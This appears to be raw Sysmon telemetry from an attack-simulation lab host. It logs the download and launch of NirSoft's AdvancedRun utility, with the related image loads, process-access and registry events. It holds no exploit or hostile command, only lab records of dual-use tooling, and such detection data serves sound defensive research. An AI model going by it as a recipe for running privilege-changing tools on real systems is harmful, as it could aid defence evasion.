21:40:31.804{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=FD486B6FA360ABE43E02E85F3164E9BE,SHA256=733922A216EC03FC6AA405205CD2F8BB81A39180F26839588B97F310E21071B5trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002925866Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.798{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft 
WindowsValidATTACKRANGE\Administrator 734700x80000000000000002925865Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.798{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002925864Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.798{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002925863Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.794{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Windows\System32\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=50FFF94E9C5357E2BE8356B52BD60D6F,SHA256=D6682E50A47E5721F112BE8BFABEB819F2554FDC7F0D2EBFAC4BC13D5B7DC883trueMicrosoft WindowsValidATTACKRANGE\Administrator 13241300x80000000000000002925861Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-20 
21:40:31.794{834264DD-0DC0-61E7-ED00-000000002402}4644C:\Windows\Explorer.EXEHKU\S-1-5-21-1639301002-1587250067-194500343-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Search\RecentApps\{DB90D0E9-13C9-4F69-83C0-736AD4E46070}\AppIdC:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeATTACKRANGE\Administrator 734700x80000000000000002925859Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.794{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002925853Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.794{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000002925851Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
21:40:31.794{834264DD-0AB0-61E7-1300-000000002402}4803508C:\Windows\System32\svchost.exe{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 13241300x80000000000000002925850Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-20 21:40:31.794{834264DD-0AB0-61E7-1300-000000002402}480C:\Windows\System32\svchost.exeHKU\S-1-5-21-1639301002-1587250067-194500343-500\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store\C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeBinary DataNT AUTHORITY\SYSTEM 10341000x80000000000000002925848Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
21:40:31.790{834264DD-0AB0-61E7-1300-000000002402}4807696C:\Windows\System32\svchost.exe{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\pcasvc.dll+52e4|c:\windows\system32\pcasvc.dll+58a9|c:\windows\system32\pcasvc.dll+5b49|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+3534e|C:\Windows\System32\RPCRT4.dll+20cc7|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000002925846Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.786{834264DD-0DBC-61E7-DC00-000000002402}20922680C:\Windows\system32\csrss.exe{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000002925845Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
21:40:31.782{834264DD-0DC0-61E7-ED00-000000002402}46443120C:\Windows\Explorer.EXE{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+a912f|C:\Windows\System32\windows.storage.dll+a8da5|C:\Windows\System32\windows.storage.dll+a8896|C:\Windows\System32\windows.storage.dll+a9d08|C:\Windows\System32\windows.storage.dll+a86be|C:\Windows\System32\windows.storage.dll+ab4d5|C:\Windows\System32\windows.storage.dll+ab854|C:\Windows\System32\windows.storage.dll+aae90|C:\Windows\System32\windows.storage.dll+ad6ba|C:\Windows\System32\windows.storage.dll+ad472|C:\Windows\System32\SHELL32.dll+3f8bd|C:\Windows\System32\SHELL32.dll+3e456|C:\Windows\System32\SHELL32.dll+801e1|C:\Windows\System32\SHELL32.dll+6717e|C:\Windows\System32\SHELL32.dll+18ce6c|C:\Windows\System32\SHELL32.dll+18cbc3|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000002925844Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.775{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exe" C:\Users\Administrator\Downloads\advancedrun-x64\ATTACKRANGE\Administrator{834264DD-0DBE-61E7-0375-0C0000000000}0xc75032HighMD5=CBC1377206ACF2A0AA01E96404DFD737,SHA256=D2B72B003C278FBECF32DAEDEB9B3CF88746E9ED33B8739F4FD96EFAB494F244{834264DD-0DC0-61E7-ED00-000000002402}4644C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECKATTACKRANGE\Administrator 
15241500x80000000000000002924843Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:20.648{834264DD-0DC0-61E7-ED00-000000002402}4644C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exe:Zone.Identifier2021-11-22 11:46:24.000MD5=FBCCF14D504B7B2DBCB5A5BDA75BD93B,SHA256=EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913[ZoneTransfer] ZoneId=3 ATTACKRANGE\Administrator 11241100x80000000000000002924842Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:20.648{834264DD-0DC0-61E7-ED00-000000002402}4644C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exe:Zone.Identifier2021-11-22 11:46:24.000ATTACKRANGE\Administrator 15241500x80000000000000002924841Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:20.645{834264DD-0DC0-61E7-ED00-000000002402}4644C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exe2021-11-22 11:46:24.000MD5=CBC1377206ACF2A0AA01E96404DFD737,SHA256=D2B72B003C278FBECF32DAEDEB9B3CF88746E9ED33B8739F4FD96EFAB494F244-ATTACKRANGE\Administrator 254200x80000000000000002924840Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:20.642{834264DD-0DC0-61E7-ED00-000000002402}4644C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exe2021-11-22 11:46:24.0002022-01-20 21:40:20.638ATTACKRANGE\Administrator 11241100x80000000000000002924839Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:20.638{834264DD-0DC0-61E7-ED00-000000002402}4644C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exe2022-01-20 21:40:20.638ATTACKRANGE\Administrator